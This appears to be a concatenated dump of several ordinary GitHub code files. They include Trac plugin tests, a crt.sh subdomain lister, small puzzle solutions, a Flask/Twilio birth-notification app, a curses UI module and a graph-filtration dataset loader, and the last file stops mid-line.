confusion_matrix[index][index] / column.sum() if column.sum() else 0\n\t\tprecisions.append(precision)\n\n\t#Calculating F1-measure\n\tF1s = []\n\tfor index, value in enumerate(unique_outputs):\n\t\tF1 = 2 * (precisions[index] * recalls[index]) / (precisions[index] + recalls[index]) if (precisions[index] + recalls[index]) else 0\n\t\tF1s.append(F1)\n\n\treturn accuracy, recalls, precisions, F1s\n","repo_name":"ehuarotop/neural-network","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":12160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15102947724","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\nimport shutil\nimport tempfile\nimport unittest\n\nfrom trac.core import Component, implements\nfrom trac.db.api import DatabaseManager\nfrom trac.perm import PermissionSystem\nfrom trac.ticket.model import Ticket\n#from trac.db.schema import Table, Column, Index\nfrom trac.test import EnvironmentStub, MockRequest\nfrom trac.resource import ResourceNotFound\nfrom trac.web.api import HTTPBadRequest, RequestDone\n\nfrom crashdump.web_ui import CrashDumpModule\nfrom crashdump.model import CrashDump\nfrom crashdump.links import CrashDumpTicketLinks\n\nclass CrashDumpWebUiTestCase(unittest.TestCase):\n def setUp(self):\n self.env = EnvironmentStub(enable=['trac.*', 'crashdump.*'])\n self.env.path = tempfile.mkdtemp()\n self.db_mgr = DatabaseManager(self.env)\n self.env.upgrade()\n #self.db = self.env.get_db_cnx()\n self.crashdump_module = CrashDumpModule(self.env)\n\n def tearDown(self):\n #self.db.close()\n self.env.shutdown()\n shutil.rmtree(self.env.path)\n\n def _create_ticket_with_change(self, old_props, new_props,\n author='anonymous'):\n \"\"\"Create a ticket with `old_props` and apply properties\n in `new_props`.\n \"\"\"\n t = Ticket(self.env)\n t.populate(old_props)\n t.insert()\n comment = new_props.pop('comment', None)\n t.populate(new_props)\n t.save_changes(author, comment=comment)\n return t\n\n def _insert_ticket(self, **kw):\n \"\"\"Helper for inserting a ticket into the database\"\"\"\n ticket = Ticket(self.env)\n for k, v in kw.items():\n ticket[k] = v\n ticket.insert()\n with self.env.db_transaction as db:\n links = CrashDumpTicketLinks(self.env, ticket, db=db)\n if 'linked_crashes' in kw:\n links.crashes = kw['linked_crashes']\n links.save(author='anonymous', db=db)\n db.commit()\n return ticket, links\n\n def _insert_crashdump(self, **kw):\n \"\"\"Helper for inserting a ticket into the database\"\"\"\n crash = CrashDump(env=self.env)\n for k, v in kw.items():\n crash[k] = v\n crash.insert()\n return crash\n\n def test_no_crash_id(self):\n req = MockRequest(self.env, authname='user', method='GET',\n args={'without-crashid':'42'})\n self.assertRaises(ResourceNotFound,\n self.crashdump_module.process_request, req)\n\n def test_non_existing_crash_id(self):\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':'42'})\n self.assertRaises(ResourceNotFound,\n self.crashdump_module.process_request, req)\n\n def test_action_view_crash(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n crash = self._insert_crashdump(reporter='user1', owner='user2')\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view'})\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, 'report.html')\n\n\n def test_action_view_crash_child(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n crash = self._insert_crashdump(reporter='user1', owner='user2')\n\n for param in ['sysinfo', 'sysinfo_ex', 'fast_protect_version_info', 'exception', 'memory_regions', 'modules', 'threads', 'memory_block', 'stackdump']:\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view', 'params': [param] })\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, param + '.html')\n\n def test_action_view_ticket_linked_crash(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n crash = self._insert_crashdump(reporter='user1', owner='user2')\n tkt, tkt_links = self._insert_ticket(reporter='user1', owner='user2', linked_crashes='%i' % crash.id)\n\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view'})\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, 'report.html')\n self.assertEqual(crash.linked_tickets, [tkt.id])\n\n def test_action_view_ticket_linked_crash_bad_crashid(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n tkt, tkt_links = self._insert_ticket(reporter='user1', owner='user2')\n crash = self._insert_crashdump(reporter='user1', owner='user2', linked_crashes='Bad#%i' % tkt.id)\n\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view'})\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, 'report.html')\n self.assertEqual(crash.linked_tickets, [])\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(CrashDumpWebUiTestCase))\n return suite\n\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n\n","repo_name":"aroth-arsoft/arsoft-web-crashupload","sub_path":"app/crashdump/tests/web_ui.py","file_name":"web_ui.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73746480233","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# author : qoolbreeze\n# version 0.1\n\nimport re\nimport requests\nfrom http import HTTPStatus\nimport sys\nfrom argparse import ArgumentParser\n\ndef parse_args() -> ArgumentParser:\n parser = ArgumentParser()\n parser.add_argument('-d', '--domain', type=str, required=True, help=\"Target domain.\")\n parser.add_argument('-o', '--output', type=str, help=\"path of the output file.\")\n return parser.parse_args()\n\ndef clear_url(target:str) -> str:\n return re.sub('.*www\\.','',target,1).split('/')[0].strip()\n\ndef save_subdomains(subdomain:str ,output_file:str) -> None:\n with open(output_file,\"a\") as f:\n f.write(subdomain + '\\n')\n f.close()\n\ndef main():\n args = parse_args()\n\n subdomains = []\n target = clear_url(args.domain)\n output = args.output\n\n req = requests.get(\"https://crt.sh/?q=%.{d}&output=json\".format(d=target))\n\n if req.status_code != HTTPStatus.OK:\n print(\"Can not join crt.sh\") \n sys.exit(1)\n\n for (key,value) in enumerate(req.json()):\n subdomains.append(value['name_value'])\n\n subdomains = sorted(set(subdomains))\n\n for subdomain in subdomains:\n print(\"[-] {s}\".format(s=subdomain))\n if output is not None:\n save_subdomains(subdomain,output)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"qoolbreeze/certificate-transparency-subdomains-getter","sub_path":"crt.py","file_name":"crt.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27635837960","text":"# 요세푸스 문제\nimport sys\nfrom collections import deque \nn,k = list(map(int,sys.stdin.readline().split()))\npeople = [x for x in range(1,n+1)]\npeople = deque(people)\nanswer = deque()\nprint('<',end='')\nwhile people :\n for i in range(k-1): people.append(people.popleft())\n print(people.popleft(),end='')\n if people: print(', ',end='')\nprint('>')","repo_name":"cone26/coding-test","sub_path":"백준/BJ-11866.py","file_name":"BJ-11866.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30297878010","text":"w, h = [int(i) for i in input().split()]\r\nsave = [ input() for i in range(h)]\r\nentrer = [i for i in save[0].split(' ')]\r\n\r\nrg = len(entrer)\r\n\r\nfor i in range(rg):\r\n print(entrer[i],end='')\r\n x,y = i*3,1\r\n while y < h:\r\n ok = 0\r\n if x < w-1 :\r\n if save[y][x+1] == '-' :\r\n x += 3\r\n ok = 1\r\n if x > 0 :\r\n if save[y][x-1] == '-' and ok == 0 :\r\n x -= 3 \r\n y+=1\r\n print(save[y-1][x])\r\n","repo_name":"ivenwicht2/python-exercice-codingame","sub_path":"ghost-legs.py","file_name":"ghost-legs.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20441567365","text":"import twilio.twiml\nfrom twilio.rest import TwilioRestClient\nfrom flask import Flask\nfrom flask import request\nfrom flask import redirect\nfrom flask import url_for\nimport requests\n\nimport utils\n\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\nutils.init_db()\nutils.make_recordings_directory()\nMESSAGE = ''\n\n\n@app.route('/')\ndef index():\n return 'go away'\n\n\n@app.route('/api/register', methods=['GET', 'POST'])\ndef register():\n resp = twilio.twiml.Response()\n resp.say('Welcome to the Labor Notifier.', voice='female')\n with resp.gather(numDigits=10, action=url_for('confirm'), method='POST') as g:\n g.say('To register to receive a phone call once the baby is born, please enter your '\\\n 'phone number. Enter the 3 digit area code, followed by the 7 digit number', voice='female')\n return str(resp)\n\n\n@app.route('/api/confirm', methods=['GET', 'POST'])\ndef confirm():\n resp = twilio.twiml.Response()\n digits = request.values.get('Digits', None)\n digits_spaced = ' '.join(ch for ch in digits)\n with resp.gather(numDigits=1, action=url_for('confirm_route', number=digits), method='GET') as g:\n g.say('You entered the number ' + digits_spaced + '. If this is correct, press 1. Otherwise, press 2.')\n return str(resp)\n\n\n@app.route('/api/confirm_route')\ndef confirm_route():\n resp = twilio.twiml.Response()\n digit = request.args.get('Digits', None)\n if digit == '1':\n number = request.args.get('number', None)\n resp.redirect(url=url_for('text_or_call', number=number), method='GET')\n return str(resp)\n else:\n resp.redirect(url=url_for('register'))\n return str(resp)\n\n\n@app.route('/api/text_or_call')\ndef text_or_call():\n resp = twilio.twiml.Response()\n number = request.args.get('number', None)\n with resp.gather(numDigits=1, action=url_for('save_number', number=number), method='GET') as g:\n g.say('If you would like to receive a text message, press 1. If you would like to receive a' \\\n ' phone call, press 2.')\n return str(resp)\n\n\n@app.route('/api/save_number')\ndef save_number():\n resp = twilio.twiml.Response()\n digit = request.args.get('Digits', None)\n number = request.args.get('number', None)\n text = None\n if digit == '1':\n text = True\n elif digit == '2':\n text = False\n else:\n resp.say(digit+' is not a valid choice.')\n resp.redirect(url_for('text_or_call', number=number), method='GET')\n return str(resp)\n number_spaced = ' '.join(ch for ch in number)\n number = '+1' + number\n utils.insert_to_db(number, text)\n resp.say('Thank you. You will receive a notification at that number once the baby is born.', voice='female')\n resp.say('Goodbye.', voice='female')\n resp.hangup()\n return str(resp)\n\n\n@app.route('/notify', methods=['GET', 'POST'])\ndef notify():\n global MESSAGE\n if request.form['Body'].startswith(app.config['PHRASE']):\n MESSAGE = request.form['Body'].replace(app.config['PHRASE'], '')\n client = TwilioRestClient(app.config['SID'], app.config['AUTHTOKEN'])\n numbers = utils.get_all_numbers()\n for number in numbers:\n if number[1] == 0:\n client.calls.create(to=number[0], from_=app.config['NUMBER'],\n url=app.config['URL']+'/api/notify')\n else:\n client.messages.create(to=number[0], from_=app.config['NUMBER'],\n body=MESSAGE)\n resp = twilio.twiml.Response()\n resp.message('Finished notifying all {} numbers'.format(len(numbers)))\n return str(resp)\n return ''\n\n\n@app.route('/api/notify', methods=['GET', 'POST'])\ndef notify_number():\n resp = twilio.twiml.Response()\n resp.say(MESSAGE, voice='female')\n with resp.gather(numDigits=1, action=url_for('record_menu'), method='POST') as g:\n g.say('If you would like to leave a message for the happy couple, please press 1. '\\\n 'If you do not wish to leave a message, press 2.', voice='female')\n return str(resp)\n\n\n@app.route('/api/record_menu', methods=['GET', 'POST'])\ndef record_menu():\n digit = request.values.get('Digits', None)\n if digit == '1':\n return redirect(url_for('record'))\n else:\n resp = twilio.twiml.Response()\n resp.say('Thank you. Goodbye.', voice='female')\n resp.hangup()\n return str(resp)\n\n\n@app.route('/api/record', methods=['GET', 'POST'])\ndef record():\n resp = twilio.twiml.Response()\n resp.say('Record your message after the tone. Make sure to state your name, and note '\\\n 'that the recording is only 30 seconds. When done, press the pound sign.', voice='female')\n resp.record(maxLength='30', action=url_for('handle_recording'), finishOnKey='#')\n return str(resp)\n\n\n@app.route('/api/handle_recording', methods=['GET', 'POST'])\ndef handle_recording():\n recording_url = request.values.get('RecordingUrl', None)\n resp = twilio.twiml.Response()\n resp.say('Thank you for leaving a message! Goodbye.', voice='female')\n resp.hangup()\n filename = 'recordings/'+request.values.get('To', None)+'.mp3'\n r = requests.get(recording_url+'.mp3', stream=True)\n with open(filename, 'wb') as fd:\n for chunk in r.iter_content():\n fd.write(chunk)\n return str(resp)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=app.config['PORT'])\n\n","repo_name":"ThaWeatherman/notify_labor","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"20011861568","text":"\nimport curses\nimport app.cli.colors as CLR\nimport logging\nimport time\n\nlogger = logging.getLogger()\n\n\nclass Screen:\n def __init__(self, screen) -> None:\n self.scr = screen\n self.scr.keypad(1)\n self.scr.notimeout(True)\n self.init_colors()\n\n def init_colors(self):\n CLR.set_colors()\n\n\nclass WindowManager:\n def __init__(self):\n self.maxy = curses.LINES - 1\n self.maxx = curses.COLS - 1\n\n def _update(self, dct):\n self.__dict__.update(dct)\n\n def add(self, **kwargs):\n for category in kwargs.keys():\n if category == 'standard':\n cls = Window\n elif category == 'message':\n cls = MessageWindow\n elif category == 'data':\n cls = DataWindow\n elif category == 'sequence':\n cls = SequenceWindow\n elif category == 'pattern':\n cls = PatternWindow\n\n for window_name, params in kwargs[category].items():\n pn = 'height', 'width', 'begin_y', 'begin_x', 'clr', 'hclr'\n separator = True if window_name \\\n in ['sequences', 'window2'] else False\n hide_empty = True if window_name == 'sequences' else False\n\n win = cls(\n **{name: params[num] for num, name in enumerate(pn)},\n hide_empty=hide_empty, separator=separator)\n self._update({window_name: win})\n\n def refresh_all(self):\n for name, object in self.__dict__.items():\n if hasattr(object, 'refresh'):\n object.get_data()\n object.refresh()\n\n\nclass Window:\n def __init__(\n self,\n scrollable=False, separator=False,\n **kwargs):\n self.win = curses.newwin(\n kwargs['height'], kwargs['width'],\n kwargs['begin_y'], kwargs['begin_x'])\n self.scrollable = scrollable\n self.separator = separator\n self.header = ''\n if scrollable:\n # self.win.setscrreg(0, 1)\n self.win.scrollok(True)\n self.win.leaveok(True)\n self.win.idlok(True)\n self.set_background(kwargs['clr'])\n self.active_line = 0\n self.active_row = 0\n self.height = kwargs['height']\n self.width = kwargs['width']\n self.clr = kwargs['clr']\n self.hclr = kwargs['hclr']\n\n def set_background(self, color_pair):\n self.win.bkgd(' ', curses.color_pair(color_pair))\n\n def focus(self, row=0):\n self.move(0, row)\n self.win.refresh()\n # curses.setsyx(1,0)\n # time.sleep(4)\n\n def focus_marker(self, y, x):\n self.move(y, x)\n self.print('[0', clr=3)\n self.win.refresh()\n\n def move(self, y, x):\n self.win.move(y, x)\n self.active_line = y\n self.active_row = x\n\n def move_pos_back(self):\n if self.active_row > 2:\n self.move(self.active_line, self.active_row-1)\n\n def backspace(self):\n self.move_pos_back()\n self.print(' ', end='')\n self.move_pos_back()\n\n def clear(self):\n self.win.erase()\n self.active_line = 0\n self.active_row = 0\n self.win.refresh()\n\n def write(self, char, move=True):\n self.win.addch(char)\n if move:\n self.active_row += 1\n self.win.refresh()\n\n def draw_separator(self):\n if self.separator:\n self.print('_' * (self.width), y=self.height - 2, end='')\n\n def parse_header(self):\n if '{' in self.header:\n hsplit = self.header.split('{')\n value = hsplit[1][:-1]\n ns, pr = value.split('.') if '.' in value else [value, '']\n return [hsplit[0], self.get_data_from_object(ns, pr)]\n else:\n return [self.header, '']\n\n def draw_header(self):\n key, value = self.parse_header()\n if value == {}:\n value = ''\n header = f' {key} {value}'\n self.print(header + ' ' * (self.width -\n len(header) - 4), clr=self.hclr)\n self.print('')\n\n def print(self, msg, end='\\n', x=0, y=0,\n pad=None, pad_chr=None, clr=0):\n clr = self.clr if clr == 0 else clr\n msg = str(msg)\n if x == 0 and y == 0:\n y = self.active_line\n x = self.active_row\n if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:\n return\n if x + len(msg) > curses.COLS:\n s = msg[:curses.COLS - x]\n else:\n s = msg\n if pad:\n ch = pad_chr or \" \"\n if pad is True:\n pad = curses.COLS # pad to edge of screen\n s += ch * (pad - x - len(msg))\n else:\n # pad to given length (or screen width)\n if x + pad > curses.COLS:\n pad = curses.COLS - x\n s += ch * (pad - len(msg))\n\n if not clr:\n clr = CLR.CLR_LOG1\n self.active_row += len(msg)\n maxy, maxx = self.win.getmaxyx()\n try:\n self.win.addstr(y, x, s, curses.color_pair(clr))\n except:\n logging.error('Curses Error while printing.')\n if self.active_line + 1 == maxy and self.height > 1:\n if self.scrollable:\n self.win.scroll()\n self.active_row = 0\n elif end == '\\n':\n self.active_line += 1\n self.active_row = 0\n self.win.move(self.active_line-1, 0)\n self.win.refresh()\n\n\nclass MessageWindow(Window):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, scrollable=True)\n\n\nclass DataWindow(Window):\n def __init__(self, vertical=True, hide_empty=False, **kwargs):\n scrollable = True if vertical else False\n super().__init__(**kwargs, scrollable=scrollable)\n self.data = {}\n self.vertical = True if kwargs['height'] > 1 else False\n self.pending = False\n self.hide_empty = hide_empty\n self.cb_get_data = None\n\n def add_get_data_cb(self, object, namespace, prop):\n self.cb_get_data = [object, namespace, prop]\n\n def get_data_from_object(self, namespace, prop):\n data = {}\n if namespace == '':\n if hasattr(self.obj, prop):\n data = getattr(self.obj, prop)\n if callable(data):\n data = data()\n else:\n if hasattr(self.obj, namespace):\n sub = getattr(self.obj, namespace)\n if hasattr(sub, prop):\n data = getattr(sub, prop)\n return data\n\n def get_data(self):\n self.data = {}\n cb = self.cb_get_data\n if not cb:\n return False\n getter = cb[0]\n self.obj = getter()\n if cb and self.obj:\n self.data = self.get_data_from_object(cb[1], cb[2])\n\n def render_item(self, item):\n key, value = item\n if self.vertical:\n key = f'{key:02}' if type(key) is int \\\n else f'{str(key):9}'\n msg = f' {key}: {str(value)}'\n if not self.vertical and key == 'file':\n value = 'untitled' if not value else value\n msg = f' {str(value)} '\n msg = msg if self.vertical else f' {msg} '\n self.print(\n msg, end='\\n' if self.vertical else '')\n\n def refresh(self):\n self.clear()\n if self.header and self.vertical:\n self.draw_header()\n if self.data:\n for item in self.data.items():\n if not (item[1] == '' and self.hide_empty):\n self.render_item(item)\n self.draw_separator()\n\n\nclass SequenceWindow(DataWindow):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.data = {}\n\n def render_item(self, item):\n key, value = item\n grp = value['group']\n if not value['name']:\n return\n self.print(f'{key:02}: ', end='')\n clr = 20 + grp if grp and grp >= 0 and grp < 5 else 0\n self.print(value['name'], end='\\n', clr=clr)\n\n\nclass PatternWindow(DataWindow):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.data = {}\n self.cb_line_renderer = None\n\n def add_line_renderer(self, cb):\n self.cb_line_renderer = cb\n\n def refresh(self):\n if not self.data or not self.cb_line_renderer:\n return\n self.clear()\n if type(self.data) is list:\n for step in self.data:\n if len(step) > 1:\n repr = self.cb_line_renderer(step[1])\n else:\n repr = ''\n self.print(f'[{step[0]:02}] {repr}')\n","repo_name":"danielwine/zyntracker-utils","sub_path":"app/cli/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":8810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20218157488","text":"import numpy as np\nfrom os.path import expanduser, exists\nimport networkx as nx\nfrom warnings import warn\nimport pickle\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.spatial import distance_matrix\nfrom sklearn.base import BaseEstimator, TransformerMixin, clone\nimport multipers as mp\nfrom typing import Iterable\n\nDATASET_PATH=expanduser(\"~/Datasets/\")\n\n\ndef get(dataset:str, filtration:str):\n\tgraphs, labels = get_graphs(dataset)\n\ttry:\n\t\tfor g in graphs:\t\n\t\t\tfor node in g.nodes:\n\t\t\t\tg.nodes[node][filtration]\n\texcept:\n\t\tprint(f\"Filtration {filtration} not computed, trying to compute it ...\", flush=1)\n\t\tcompute_filtration(dataset, filtration)\n\treturn get_graphs(dataset)\n\n\n\ndef get_from_file_old(dataset:str, label=\"lb\"):\n\tfrom os import walk\n\tfrom scipy.io import loadmat\n\tfrom warnings import warn\n\tpath = DATASET_PATH + dataset +\"/mat/\"\n\tlabels:list[int] = []\n\tgs:list[nx.Graph] = []\n\tfor root, dir, files in walk(path):\n\t\tfor file in files:\n\t\t\tfile_ppties = file.split(\"_\")\n\t\t\tgid = file_ppties[5]\n\t\t\ti=0\n\t\t\twhile i+1 < len(file_ppties) and file_ppties[i] != label :\n\t\t\t\ti+=1\n\t\t\tif i+1 >= len(file_ppties):\n\t\t\t\twarn(f\"Cannot find label {label} on file {file}.\")\n\t\t\telse:\n\t\t\t\tlabels += [file_ppties[i+1]]\n\t\t\tadj_mat = np.array(loadmat(path + file)['A'], dtype=np.float32)\n\t\t\tgs.append(nx.Graph(adj_mat))\n\treturn gs, labels\n\n\ndef get_from_file(dataset:str):\n\tfrom os.path import expanduser, exists\n\tpath = DATASET_PATH + f\"{dataset}/{dataset[7:]}.\"\n\ttry:\n\t\tgraphs_ids = np.loadtxt(path+\"graph_idx\")\n\texcept:\n\t\treturn get_from_file_old(dataset=dataset)\n\tlabels:list[int] = LabelEncoder().fit_transform(np.loadtxt(path+\"graph_labels\"))\n\tedges = np.loadtxt(path+\"edges\", delimiter=',', dtype=int)-1\n\thas_intrinsic_filtration = exists(path+\"node_attrs\")\n\tgraphs:list[nx.Graph] = []\n\tif has_intrinsic_filtration:\n\t\tF = np.loadtxt(path+\"node_attrs\", delimiter=',')\n\tfor graph_id in tqdm(np.unique(graphs_ids), desc=\"Reading graphs from file\"):\n\t\tnodes, = np.where(graphs_ids == graph_id)\n\t\tdef graph_has_edge(u:int,v:int)->bool:\n\t\t\tif u in nodes or v in nodes:\n\t\t\t\tassert u in nodes and v in nodes, f\"Nodes {u} and {v} are not in the same graph\"\n\t\t\t\treturn True\n\t\t\treturn False\n\t\tgraph_edges = [(u,v) for u,v in edges if graph_has_edge(u,v)]\n\t\tg = nx.Graph(graph_edges)\n\t\tif has_intrinsic_filtration:\n\t\t\tnode_attrs = {node:F[node] for node in nodes}\n\t\t\tnx.set_node_attributes(g,node_attrs, \"intrinsic\")\n\t\tgraphs.append(g)\n\treturn graphs, labels\n\n\ndef get_graphs(dataset:str, N:int|str=\"\")->tuple[list[nx.Graph], list[int]]:\n\tgraphs_path = f\"{DATASET_PATH}{dataset}/graphs{N}.pkl\"\n\tlabels_path = f\"{DATASET_PATH}{dataset}/labels{N}.pkl\"\n\tif not exists(graphs_path) or not exists(labels_path):\n\t\tif dataset.startswith(\"3dshapes/\"):\n\t\t\treturn get_from_file_old(dataset,)\n\t\tgraphs, labels = get_from_file(dataset,)\n\t\tprint(\"Saving graphs at :\", graphs_path)\n\t\tset_graphs(graphs = graphs, labels = labels, dataset = dataset)\n\telse:\n\t\tgraphs = pickle.load(open(graphs_path, \"rb\"))\n\t\tlabels = pickle.load(open(labels_path, \"rb\"))\n\tfrom sklearn.preprocessing import LabelEncoder\n\treturn graphs, LabelEncoder().fit_transform(labels)\n\n\ndef set_graphs(graphs:list[nx.Graph], labels:list, dataset:str, N:int|str=\"\"): # saves graphs (and filtration values) into a file\n\tgraphs_path = f\"{DATASET_PATH}{dataset}/graphs{N}.pkl\"\n\tlabels_path = f\"{DATASET_PATH}{dataset}/labels{N}.pkl\"\n\tpickle.dump(graphs, open(graphs_path, \"wb\"))\n\tpickle.dump(labels, open(labels_path, \"wb\"))\n\treturn\n\ndef reset_graphs(dataset:str, N=None): # Resets filtrations values on graphs\n\tgraphs, labels = get_from_file(dataset)\n\tset_graphs(graphs,labels, dataset)\n\treturn\n\n\n\n\ndef compute_ricci(graphs:list[nx.Graph], alpha=0.5, progress = 1):\n\tfrom GraphRicciCurvature.OllivierRicci import OllivierRicci\n\tdef ricci(graph, alpha=alpha):\n\t\treturn OllivierRicci(graph,alpha=alpha).compute_ricci_curvature()\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(ricci)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing ricci\"))\n\treturn graphs\n\ndef compute_cc(graphs:list[nx.Graph], progress = 1):\n\tdef _cc(g):\n\t\tcc = nx.closeness_centrality(g)\n\t\tnx.set_node_attributes(g,cc,\"cc\")\n\t\tedges_cc = {(u,v):max(cc[u], cc[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_cc, \"cc\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_cc)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing cc\"))\n\treturn graphs\n\t# for g in tqdm(graphs, desc=\"Computing cc\"):\n\t# \t_cc(g)\n\t# return graphs\n\ndef compute_degree(graphs:list[nx.Graph], progress=1):\n\tdef _degree(g):\n\t\tdegrees = {i:1.1 if degree == 0 else 1 / degree for i, degree in g.degree}\n\t\tnx.set_node_attributes(g,degrees,\"degree\")\n\t\tedges_dg = {(u,v):max(degrees[u], degrees[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_dg, \"degree\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_degree)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing degree\"))\n\treturn graphs\n\t# for g in tqdm(graphs, desc=\"Computing degree\"):\n\t# \t_degree(g)\n\t# return graphs\n\ndef compute_fiedler(graphs:list[nx.Graph], progress = 1): # TODO : make it compatible with non-connexe graphs\n\tdef _fiedler(g):\n\t\tconnected_graphs = [nx.subgraph(g, nodes) for nodes in nx.connected_components(g)]\n\t\tfiedler_vectors = [nx.fiedler_vector(g)**2 if g.number_of_nodes() > 2 else np.zeros(g.number_of_nodes()) for g in connected_graphs] # order of nx.fiedler_vector correspond to nx.laplacian -> g.nodes\n\t\t# print(len(fiedler_vectors))\n\t\t\n\t\tfiedler_dict = {\n\t\t\tnode:fiedler_vector[node_index]\n\t\t\tfor g,fiedler_vector in zip(connected_graphs, fiedler_vectors)\n\t\t\tfor node_index,node in enumerate(list(g.nodes))\n\t\t}\n\t\tnx.set_node_attributes(g,fiedler_dict,\"fiedler\")\n\t\tedges_fiedler = {(u,v):max(fiedler_dict[u], fiedler_dict[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_fiedler, \"fiedler\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_fiedler)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing fiedler\"))\n\treturn graphs\n\t# for g in tqdm(graphs, desc=\"Computing fiedler\"):\n\t# \t_fiedler(g)\n\t# return graphs\n\ndef compute_hks(graphs:list[nx.Graph],t:float, progress = 1):\n\tdef _hks(g:nx.Graph):\n\t\tw, vps = np.linalg.eig(nx.laplacianmatrix.normalized_laplacian_matrix(g, nodelist=g.nodes()).toarray()) # order is given by g.nodes order\n\t\tw = w.view(dtype=float)\n\t\tvps= vps.view(dtype=float)\n\t\tnode_hks = {node:np.sum(np.exp(-t*w)*np.square(vps[node_index,:])) for node_index,node in enumerate(g.nodes)}\n\t\tnx.set_node_attributes(g, node_hks, f\"hks_{t}\")\n\t\tedges_hks = {(u,v):max(node_hks[u], node_hks[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_hks, f\"hks_{t}\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_hks)(g) for g in tqdm(graphs, disable = not progress, desc=f\"Computing hks_{t}\"))\n\treturn graphs\n\ndef compute_geodesic(graphs:list[nx.Graph], progress=1):\n\tdef _f(g:nx.Graph):\n\t\ttry:\n\t\t\tnodes_intrinsic = {i:n[\"intrinsic\"] for i,n in g.nodes.data()}\n\t\texcept:\n\t\t\twarn(\"This graph doesn't have an intrinsic filtration, will use 0 instead ...\")\n\t\t\tnodes_intrinsic = {i:0 for i,n in g.nodes.data()}\n\t\t\t# return g\n\t\tnode_geodesic = {i:0 for i in g.nodes}\n\t\tnx.set_node_attributes(g, node_geodesic, f\"geodesic\")\n\t\tedges_geodesic = {(u,v):np.linalg.norm(nodes_intrinsic[u] - nodes_intrinsic[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_geodesic, f\"geodesic\")\n\t\treturn g \n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_f)(g) for g in tqdm(graphs, disable = not progress, desc=f\"Computing geodesic distances on graphs\"))\n\treturn graphs\n\ndef compute_filtration(dataset:str, filtration:str, **kwargs):\n\tif filtration == \"ALL\":\n\t\t# reset_graphs(dataset) # not necessary\n\t\tgraphs,labels = get_graphs(dataset, **kwargs)\n\t\tgraphs = compute_geodesic(graphs)\n\t\tgraphs = compute_cc(graphs)\n\t\tgraphs = compute_degree(graphs)\n\t\tgraphs = compute_ricci(graphs)\n\t\tgraphs = compute_fiedler(graphs)\n\t\tgraphs = compute_hks(graphs, 10)\n\t\tset_graphs(graphs=graphs, labels=labels, dataset=dataset)\n\t\treturn\n\tgraphs,labels = get_graphs(dataset, **kwargs)\n\tif filtration == 